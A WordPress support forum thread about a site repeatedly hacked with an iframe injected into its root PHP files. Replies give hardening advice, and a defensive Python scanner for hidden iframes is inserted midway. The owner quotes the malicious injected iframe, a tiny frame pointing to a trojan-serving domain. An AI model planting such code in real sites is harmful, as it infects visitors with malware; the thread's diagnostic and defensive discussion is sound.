• Hi guys, since yesterday my website has been hacked 2 times. They add an iframe in all the PHP files in the root of my website; they don’t go further. I uploaded new root files but nothing, they hacked it again.

    Anyone know why? And how?

Viewing 15 replies - 1 through 15 (of 16 total)
  • Did you upload all new files? Or just some new files?

    Did you change passwords for all of your non-subscriber users? That is, all of your users with better than read-only permissions.

    Why? Fun and/or profit.

    How? Hard to say without access to the server, which no one here has. Perhaps your host can help. If it is a flaw in your site it is usually either a bad password or a vulnerability in a plugin or theme. If you are on a shared server, a vulnerability in any of the sites, not just yours, can allow a hacker access to all or some of the other sites too.

    FAQ: My Site Was Hacked

    As far as I know, there is a bug exploit within wp-config.php via sy*l*nk or ju*pl*nk.

    I got this info from my friend a few hours ago. Try to protect your wp-config.php with .htaccess so your wp-config.php is only accessible from your cpanel.

    What is the exploit and how is it prevented? Mentioning it in passing doesn’t really help anyone. If you are referring to what I think you are, that is really an Apache (mis)configuration problem, but something to be aware of nonetheless.

    Deny access to your wp-config.php, that’s it.

    Thread Starter v00d0

    (@v00d0)

    Yes, fresh files. Anyway, they put this iframe that links to a trojan that jumps into your local tmp folder.

    Could perhaps be the result of an FTP leak. Have you changed all of your passwords – including FTP?

    Thread Starter v00d0

    (@v00d0)

    Yes, I’m doing it right now. Thanks for the advice, I’ll let you know if they do it again.

    @blacklizt, I know several different ways to deny access to wp-config. People posting here asking for help probably don’t know. That is why they are asking. What you are saying is probably correct, but not very helpful and it is a ‘help’ forum. So, exactly what would you do to deny access to wp-config.php?

    It would also help if you could explain the exploit because I only see one line that might be vulnerable and it would be very, very difficult to pull off.

    @v00d0, you aren’t really giving enough information for anyone to help you. Please try to be more specific. For example, do you know what the trojan was? Can a scanner like Sucuri identify it? This should help: http://codex.wordpress.org/Hardening_WordPress

    Thread Starter v00d0

    (@v00d0)

    The trojan was identified by my ESET Antivirus. I can put the iframe that links to the trojan here, but I don’t know if I can do it.

    This is all the information I got:

    – WordPress 3.4.1
    – iframe inside root website files that links to a trojan
    – if I reupload all the files they still can access my site
    – I changed all the passwords.

    this is the website:

    consoleopen.com

    Be sure to clear the Hyper Cache data.

    I don’t know that posting the iframe would help. I am trying to find out the name of the trojan/exploit, if it has a name, in order to help identify how it got there.

    If you re-uploaded all files then the problem is a bad password in the database, you missed a few files, you have a vulnerable plugin or theme, or there is a bigger problem with your server configuration/environment. You are running several plugins and your theme has some custom JavaScript. Is everything up-to-date?

    What are the file permissions on your server?

    Thread Starter v00d0

    (@v00d0)

    The permissions are OK: folders 755, files 644.

    This was the iframe:

    <iframe src="http://starttraffik.**/" width="2" height="3" frameborder="0"></iframe>

    Check the website at your risk (it is .net). The theme was developed for my website; they never updated it.
    This is the list of my plugins:

    advertising manager
    contact form 7
    google analyticator
    google xml sitemaps
    hyper cache
    my brand login
    new adman
    platinum seo pack
    really simple captcha
    related post category widget
    shadowbox js
    shadowbox js- use title from image
    static random post widget
    statpress
    widget logic
    wordpress database backup
    youtuber
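
A defender-side check for the injection described in this thread, as an added example that is not from any poster: it walks a web root and reports files containing an external iframe that is tiny or hidden by CSS. The `injected.example` domain, the 5-pixel threshold and all function names are assumptions made for the illustration.

```python
import os
import re
import tempfile

MAX_DIM = 5  # assumption: an iframe this many pixels or fewer is effectively invisible
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
EXTERNAL_RE = re.compile(r"^(?:https?:)?//", re.I)
HIDDEN_CSS_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def is_tiny(value):  # True for dimensions such as "2" or "3px" that are <= MAX_DIM
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value, re.I)
    return bool(m) and int(m.group(1)) <= MAX_DIM

def suspicious_iframes(text):
    """Return the src of every external iframe that is tiny or hidden by CSS."""
    found = []
    for tag in IFRAME_RE.findall(text):
        # attribute name -> value, whichever quoting style the tag used
        a = {m[1].lower(): m[2] or m[3] or m[4] or "" for m in ATTR_RE.finditer(tag)}
        hidden = (is_tiny(a.get("width", "")) or is_tiny(a.get("height", ""))
                  or HIDDEN_CSS_RE.search(a.get("style", "")))
        if hidden and EXTERNAL_RE.match(a.get("src", "")):
            found.append(a["src"])
    return found

def scan_webroot(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk root recursively and return sorted (relative path, iframe src) pairs."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits += [(os.path.relpath(path, root), src)
                             for src in suspicious_iframes(fh.read())]
    return sorted(hits)

def demo():
    """Constructed web root: one clean file, one with an appended hidden iframe."""
    clean = "<?php require 'wp-blog-header.php'; ?>\n"
    bad = clean + '<iframe src="http://injected.example/" width="2" height="3"></iframe>\n'
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.php", clean), ("wp-login.php", bad)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_webroot(root)

if __name__ == "__main__":
    print(demo())
```

It only catches plain-text iframe tags; injections that are encoded or assembled at runtime need a file-by-file comparison against a known-clean copy.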

    To prevent the wp-config.php exploit via symlinks,

    add the code below to your .htaccess:

    <Files wp-config.php>
    order allow,deny
    deny from all
    </Files>

    You can find many articles about symlinks on Google. It’s an old issue but it still happens now.

    Actually, the WordPress Codex already explains how to secure wp-config.php:
    http://codex.wordpress.org/Hardening_WordPress but not all WordPress users know about this.

    Thread Starter v00d0

    (@v00d0)

    really thanks

    How about your plugins? Are they all updated? Are any of them really old and haven’t been maintained?

    I am assuming you are on shared hosting? Is that correct?

    Thread Starter v00d0

    (@v00d0)

    No! I pay for a dedicated server; plugins are all up to date, it seems.

  • The topic ‘My wordpress website got hacked, multiple times.’ is closed to new replies.